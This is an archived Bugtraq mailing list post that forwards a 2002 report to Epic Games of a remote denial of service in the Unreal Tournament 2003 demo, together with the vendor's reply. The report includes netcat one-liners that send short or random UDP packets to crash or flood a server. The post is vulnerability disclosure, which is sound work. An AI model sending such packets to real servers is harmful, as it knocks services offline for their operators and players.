Bugtraq: Fw: [ut2003bugs] remote denial of service in ut2003 demo

Nmap Security Scanner

Intro

Ref Guide

Install Guide

Download

Changelog

Book

Docs
Security Lists

Bugtraq

Basics

More
Security Tools

More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

Bugtraq mailing list archives

Fw: [ut2003bugs] remote denial of service in ut2003 demo

From: "Arne Schwerdtfegger" <knud () skodliv dk>
Date: Tue, 17 Sep 2002 17:23:13 +0200

This might be of interest since the isse at hand is fixed now.

----- Original Message -----
From: "Daniel Vogel" <vogel () epicgames com>
To: "Arne Schwerdtfegger" <knud () skodliv dk>; <ut2003bugs () epicgames com>
Sent: Saturday, September 14, 2002 11:11 PM
Subject: RE: [ut2003bugs] remote denial of service in ut2003 demo

We will address this denial of service attack shortly.

Thanks!

-- Daniel, Epic Games Inc.

-----Original Message-----
From: owner-ut2003bugs () lists epicgames com
[mailto:owner-ut2003bugs () lists epicgames com]On Behalf Of Arne
Schwerdtfegger
Sent: Saturday, September 14, 2002 5:03 PM
To: ut2003bugs () epicgames com
Subject: [ut2003bugs] remote denial of service in ut2003 demo

Dear sirs,

It's possible to crash the client/the dedicated server by sending 1-3
character to udp ports 7778 or 10777. 4 characters will produce the
following in the console: "Log: Unkown ping request command: 65".
This can be reproduced with netcat[1] as follows:
echo "a" | nc -u target 10777

Doing something like `cat /dev/urandom | nc -u target 7778`
will flood the console with "Log: RecvFrom returned SOCKET_ERROR 10040"

The tested platform was windows 2000 with servicepack 3, not that I

think

it matters.

[1] http://www.atstake.com/research/tools/
--
Knud Erik Højgaard
knud () INVALIDskodliv dk

By Date By Thread

Current thread:

Fw: [ut2003bugs] remote denial of service in ut2003 demo Arne Schwerdtfegger (Sep 18)